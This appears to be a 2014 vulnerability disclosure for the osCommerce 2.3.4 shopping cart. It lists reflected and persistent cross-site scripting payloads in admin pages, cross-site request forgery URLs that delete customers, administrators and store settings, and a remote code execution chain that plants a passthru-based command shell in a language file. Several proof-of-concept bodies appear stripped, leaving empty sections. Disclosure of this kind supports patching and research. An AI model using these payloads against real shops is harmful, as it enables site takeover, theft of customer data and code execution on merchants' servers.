#Title: osCommerce 2.3.4 - Multiple vulnerabilities
#Date: 10.07.14
#Affected versions: => 2.3.4 (latest atm)
#Vendor: oscommerce.com
#Tested on: Apache 2.2.22 [at] Debian
#Contact: smash [at] devilteam.pl
#Cross Site Scripting
1. Reflected XSS -> Send Email
Vulnerable parameters - customers_email_address & mail_sent_to
a) POST
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/mail.php?action=preview HTTP/1.1
Host: localhost
customers_email_address=&from=fuck@shit.up&subject=test&message=test
Response:
HTTP/1.1 200 OK
(...)
Customer:
|
(...)
CSRF PoC:
b) GET
Request:
GET /osc/oscommerce-2.3.4/catalog/admin/mail.php?mail_sent_to=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1
Host: localhost
Response:
(...)
 &nbps;Notice: Email sent to: |
(...)
2. Persistent XSS via CSRF -> Newsletter
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/newsletters.php?action=insert HTTP/1.1
Host: localhost
module=newsletter&title=&content=
CSRF PoC:
First popbox (123) will be executed whenever someone will visit newsletters page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php
(...)
 &nbps; |
(...)
|
(...)
Second one, will be executed whenever someone will visit specific newsletter page:
localhost/osc/oscommerce-2.3.4/catalog/admin/newsletters.php?page=1&nID=1&action=preview
(...)
|
(...)
3. Persistent XSS via CSRF -> Banner manager
Vulnerable parameter - banners_title
PoC:
JS will be executed whenever someone will visitd banner manager page or specific banner page.
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php
localhost/osc/oscommerce-2.3.4/catalog/admin/banner_manager.php?page=1&bID=[ID]
Response:
 &nbps; |
group |
4. Persistent XSS via CSRF -> Locations / Taxes
Countries tab is taken as example, but same vulnerability affects other tabs in 'Locations / Taxes', namely Tax Classes, Tax Rates, Tax Zones and Zones.
PoC:
JS will be executed whenever someone will visitd 'countries' tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php
Response:
(...)
| AAAA |
xs |
sed |
(...)
5. Persistent XSS via CSRF -> Localization
a) Currencies
PoC:
JS will be executed whenever someone will visit currencies tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php
Response:
(...)
| (default) |
666 |
666.00000000 |
(...)
b) Languages
PoC:
JS will be executed whenever someone will visit langauges tab:
localhost/osc/oscommerce-2.3.4/catalog/admin/languages.php
Response:
(...)
|
66 |
(...)
c) Orders status
Request:
POST /osc/oscommerce-2.3.4/catalog/admin/orders_status.php?page=1&action=insert HTTP/1.1
Host: localhost
orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B3%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B4%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B5%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B6%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B7%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS
Response:
(...)
'>"><>XSS |
(...)
'>"><>XSS |
(...)
 &nbps;'>"><>XSS
" title="">" />&nbps;'>"><>XSS
 <>XSS/images/icon.gif'>"><>XSS" border="0" alt="">" title="">" />&nbps;'>"><>XSS
 <>XSS" border="0" alt="">" title="">" />&nbps;'>"><>XSS
" title="">" />&nbps;'>"><>XSS
<>XSS" border="0" alt="">" title="">" />&nbps;'>"><>XSS
 &nbps;'>"><>XSS |
#Boring CSRF
- Remove any item from cart
localhost/osc/oscommerce-2.3.4/catalog/shopping_cart.php?products_id=[ID]&action=remove_product
- Add item to cart
localhost/osc/oscommerce-2.3.4/catalog/product_info.php?products_id=[ID]&action=add_product
- Remove address book entry
localhost/osc/oscommerce-2.3.4/catalog/address_book_process.php?delete=1
- Remove specific country
localhost/osc/oscommerce-2.3.4/catalog/admin/countries.php?page=1&cID=1&action=deleteconfirm
- Remove specific currency
localhost/osc/oscommerce-2.3.4/catalog/admin/currencies.php?page=1&cID=[ID]&action=deleteconfirm
- Change store credentials
I'm to bored to craft another request's, whole 'Configuration' & 'Catalog' panel suffers on CSRF.
localhost/osc/oscommerce-2.3.4/catalog/admin/configuration.php
...and a lot more.
#Less boring CSRF
- Send email as admin -> Send email
It is able to send email to specific user, newsletter subscribers and all of them. In this case, '***' stands for sending mail to all customers.
- Delete / Edit specific user
Remove user PoC:
localhost/osc/oscommerce-2.3.4/catalog/admin/customers.php?page=1&cID=1&action=deleteconfirm
Edit user PoC:
- Add / Edit / Delete admin
Add admin account:
Change admin (set new password):
Remove admin:
localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm
- RCE via CSRF -> Define Languages
It is able to change content of specific file in 'define languages' tab, we're gonna use default english language, and so default files path. File MUST be writable. Value stands for english.php default content; as you can notice, passthru function is being included.
localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a
PoC: